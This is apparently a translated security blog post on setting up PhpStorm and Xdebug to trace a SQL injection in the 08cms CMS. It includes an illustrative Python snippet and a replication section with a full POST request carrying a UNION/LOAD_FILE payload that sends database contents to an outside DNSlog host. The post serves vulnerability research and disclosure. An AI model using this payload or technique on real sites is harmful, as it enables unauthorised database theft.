Dynamic Analysis Small Sample | 08CMS SQL Injection Analytics

Source: Internet
Author: User
Tags: sql injection, vc9

i春秋 (ichunqiu) author: YANZM

0x00 background

This week I got hold of the 08cms source. It is not available for download from the official site (it has to be purchased) and was provided by a teacher. While auditing it I found that this CMS passes data around in a fairly complicated way, which makes static analysis awkward to work with. Since I had just set up a new computer, I installed PhpStorm + Xdebug + Xdebug-ext (Firefox) directly for dynamic analysis. This article walks through a dynamic-analysis exercise using a SQL injection vulnerability as the example; the source has other holes still to be dug out, and I look forward to discussing them with the teachers.

0x01 Audit process: dynamic analysis environment configuration

Dynamic analysis combination: Phpstorm+xdebug+xdebug-ext (Firefox)

Readers who have followed this public account for a while should have no trouble setting up this environment, so I will only list a few configuration points. If anything is unclear, refer to: http://www.cnblogs.com/xujian2016/p/5548921.html

Settings for PHP

First, download the Xdebug extension matching the PHP version on your machine from https://xdebug.org/download.php; here it is \php\php-5.3.29-nts\ext\php_xdebug-2.2.7-5.3-vc9-nts.dll.

Then add the following to php.ini; once done, check phpinfo() to confirm that Xdebug has taken effect.

[XDebug]
zend_extension = "D:\soft\phpStudy\PHPTutorial\php\php-5.3.29-nts\ext\php_xdebug-2.2.7-5.3-vc9-nts.dll"
xdebug.profiler_append = 0
xdebug.profiler_enable = 1
xdebug.profiler_enable_trigger = 0
xdebug.profiler_output_dir = "D:\soft\phpStudy\PHPTutorial\tmp\xdebug"
xdebug.trace_output_dir = "D:\soft\phpStudy\PHPTutorial\tmp\xdebug"
xdebug.profiler_output_name = "cache.out.%t-%s"
xdebug.remote_enable = 1
xdebug.remote_handler = "dbgp"
xdebug.remote_host = "127.0.0.1"
xdebug.remote_port = 9000
xdebug.idekey = PHPSTORM

Settings for Phpstorm

Configure the PHP interpreter: point PhpStorm at the location of php.exe.

Configure the debug port; the default, 9000, matches the xdebug.remote_port set in php.ini.

Configure the proxy port and IDE key; the port should match the site's port.

In Edit Configurations, make the following settings:

Xdebug-ext (Firefox)

It is best to use the Firefox Developer Edition; otherwise many add-ons will not work.

After installing the Xdebug-ext add-on, set the IDE key in its settings.

Basic use

When visiting the target page to debug, first turn on PhpStorm's debug connection listener (the telephone icon, "Start Listening for PHP Debug Connections").

Then enable the little ladybug icon of Xdebug-ext in Firefox.

With it enabled, the add-on automatically attaches XDEBUG_SESSION=PHPSTORM to the request, and PhpStorm can debug it.

SQL injection problem: 0x00 Related environment

Source: 08cms_v5.0_gbk_20140314

Affected file: \08cms\08cms_v5.0_gbk_20140314\upload_gbk\include\field.fun.php

Vulnerability type: SQL injection

Site address: http://www.08cms.com/

0x01 Vulnerability Analysis

The data flow in the 08cms source is fairly complex, so rather than tracing it statically in Notepad++, I used the PhpStorm + Xdebug + Xdebug-ext (Firefox) combination for dynamic analysis and data-flow tracking.

Register a member on the site and log in to the member centre.

On the left, under Basic information -> Basic information -> Member details, there is an input box above the attachment upload; a brief test shows that it holds the image path after an upload.

Out of habit from auditing plugins (input boxes that store a path tend to have complicated handling rules), I started testing there and found that a single quote could be introduced at this location.

However, when constructing a SQL statement it became clear that the input at this location is processed, so building a payload black-box was not going well, and I started debugging. Since the form submits to http://127.0.0.1:8081/adminm.php?action=memberinfo_pthy&mid=2, I set a breakpoint on line 10 of \08cms\08cms_v5.0_gbk_20140314\upload_gbk\adminm.php.

First, click the telephone icon in PhpStorm to listen for debug connections.

Then submit the form; Xdebug-ext (Firefox) automatically attaches the debug IDE key. Step over with F8 until execution reaches the breakpoint, step into with F7, and then continue with F8.

On the second step-in I entered \08cms\08cms_v5.0_gbk_20140314\upload_gbk\libs\classes\frontpage\adminmpagebase.cls.php. After line 15 of that file finishes executing, the SQL log shows that the single quote has made it into the SQL statement, so I set a breakpoint at that position.

Repeating this (F8 to step over, F7 to step into at the breakpoint, running to the location and stepping into it on the next pass), I eventually traced execution to the problematic block of code.

The following are the breakpoint positions from my trace, which show how the code runs and how the data is passed along.

After confirming the location of the problem code, you can remove the other breakpoints and keep only the one at the critical position; here I kept only the breakpoint at line 150 of \08cms\08cms_v5.0_gbk_20140314\upload_gbk\include\field.fun.php.

Reading the code block (the variable values are shown to the right of the code while debugging), the value is first processed by splitting on | and #, then passed through basename() before being put into the SQL statement. 08cms escapes single quotes in the submitted arguments, but although the quote is escaped, the escaping backslash is eaten by basename(), which reintroduces the bare single quote into the SQL statement and results in SQL injection.
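To make this ordering bug concrete, here is an added example (mine, not 08cms code) that emulates the escape-then-basename() sequence described above. ntpath.basename stands in for PHP's basename() on Windows, where both '/' and '\' are separators (on Linux, basename() would leave the backslash alone); addslashes and the cms_members/mlogo statement are constructed stand-ins for the CMS's own escaping and query. The fixed builder shows the remedy: normalise the path first and escape last (or, better still, bind the value with a prepared statement).

```python
import ntpath  # Windows rules: '/' and '\' both separate, like PHP basename() on Windows


def addslashes(value: str) -> str:
    """Stand-in for the CMS's quote escaping (PHP addslashes() semantics)."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_update_vulnerable(mlogo: str) -> str:
    """Order described on the page: escape first, basename() second.
    The backslash protecting the quote is taken as a path separator and
    discarded, so the bare quote reaches the SQL text."""
    filename = ntpath.basename(addslashes(mlogo))
    return f"UPDATE cms_members SET mlogo='{filename}'"


def build_update_fixed(mlogo: str) -> str:
    """Hardened order: normalise the path first, escape last, so later
    string processing cannot undo the escaping."""
    filename = ntpath.basename(mlogo)
    return f"UPDATE cms_members SET mlogo='{addslashes(filename)}'"


def unescaped_quotes(sql: str) -> int:
    """Count single quotes not preceded by a backslash. A statement with
    one string literal is well-formed only when this is exactly two."""
    count, i = 0, 0
    while i < len(sql):
        if sql[i] == "\\":
            i += 2  # skip the escaped character
            continue
        if sql[i] == "'":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    # Constructed sample: an upload path whose last segment carries a quote.
    sample = "userfiles/image/' -- cache.jpg"
    for builder in (build_update_vulnerable, build_update_fixed):
        sql = builder(sample)
        print(f"{builder.__name__}: {sql}  (unescaped quotes: {unescaped_quotes(sql)})")
```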

0x02 Vulnerability Replication

Submitting the following payload in the Fmdata[mlogo] field queries data out of the database: ' Union Select Load_file (CONCAT (0x5c5c, (select Hex (group_concat) from Mname where 1 LIMIT 1), 0x2e6d7973716c2e38353731653539342e326d312e70772f2f616263) -- . When constructing the payload, note that apart from the opening single quote no other single quotes may be used: each would be escaped to \' and, after basename(), that would break the structure of the statement.

POST http://127.0.0.1:8081/adminm.php?action=memberinfo_pthy&mid=2 HTTP/1.1
Host: 127.0.0.1:8081
Proxy-Connection: keep-alive
Content-Length: 1563
Cache-Control: max-age=0
Origin: http://127.0.0.1:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=--webkitformboundaryhubb3majcygbjr0q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://127.0.0.1:8081/adminm.php?action=memberinfo_pthy
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
Cookie: vgm_userauth=icwfvar8isej5t3p9bvhw%2bzltvqmlhl8vms0iij3zoeol2%2fa%2fax8vtdh

----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="_08_hash"

5228bb59d0b24b049a00dbc1c21fae97
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Fmdata[nicename]"

Thinking
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Fmdata[mlogo]"

http://127.0.0.1:8081/userfiles/image/20180328/' union Select Load_file (CONCAT (0x5c5c, (select Hex (GROUP_concat (Mname)) from Cms_members where 1 LIMIT 1), 0x2e6d7973716c2e38353731653539342e326d312e70772f2f616263)) --1a= 28164700edc421674c5194.jpg
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Fmdata[phone]"

18988888888
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Fmdata[email]"

[email protected]
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="FMDATA[QQ]"

88888888
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="FMDATA[COID20]"

0
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Fmdata[birthday]"

----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="fmdata[**]"

1
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Fmdata[education]"

1
----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Fmdata[profession]"

----webkitformboundaryhubb3majcygbjr0q
Content-Disposition: form-data; name="Bsubmit"

{
----webkitformboundaryhubb3majcygbjr0q--

Checking the DNSlog after sending the request shows that the queried data was received.

0x03 Summary

This article used a SQL injection vulnerability in 08cms as an example to share the dynamic analysis method I use. Some teachers recommend VSCode instead; it comes down to personal habit, and I am used to PhpStorm. If the teachers have other good audit methods, please suggest them, and you are welcome to share audit material so we can learn and improve together. If you are HC, please stay away and do not disturb; anyone wishing to exchange ideas and study together may contact me.

Note: This article is limited to study and research use and is prohibited for illegal use. All illegal uses, unrelated to the original author.
